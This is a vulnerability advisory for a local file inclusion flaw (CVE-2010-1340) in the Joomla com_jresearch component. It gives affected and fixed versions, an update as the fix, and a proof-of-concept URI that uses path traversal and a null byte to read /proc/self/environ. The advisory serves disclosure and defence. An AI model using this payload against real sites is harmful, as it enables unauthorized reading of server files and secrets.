Joomla! 'com_jresearch' Component 'controller' Parameter Local File Include Vulnerability
BID:38917
Info
Joomla! 'com_jresearch' Component 'controller' Parameter Local File Include Vulnerability
| Bugtraq ID: | 38917 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-1340 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 24 2010 12:00AM |
| Updated: | Apr 13 2015 09:02PM |
| Credit: | Chip D3 Bi0s |
| Vulnerable: |
Joomla com_jresearch 0 |
| Not Vulnerable: |
Joomla com_jresearch 1.2.1 Joomla com_jresearch 1.1.4.4 |
Exploit / POC
Joomla! 'com_jresearch' Component 'controller' Parameter Local File Include Vulnerability
Attackers can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00
Attackers can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00
Solution / Fix
Joomla! 'com_jresearch' Component 'controller' Parameter Local File Include Vulnerability
Solution:
Updates are available; please see the references for more information.
Solution:
Updates are available; please see the references for more information.
References
Joomla! 'com_jresearch' Component 'controller' Parameter Local File Include Vulnerability
References:
References: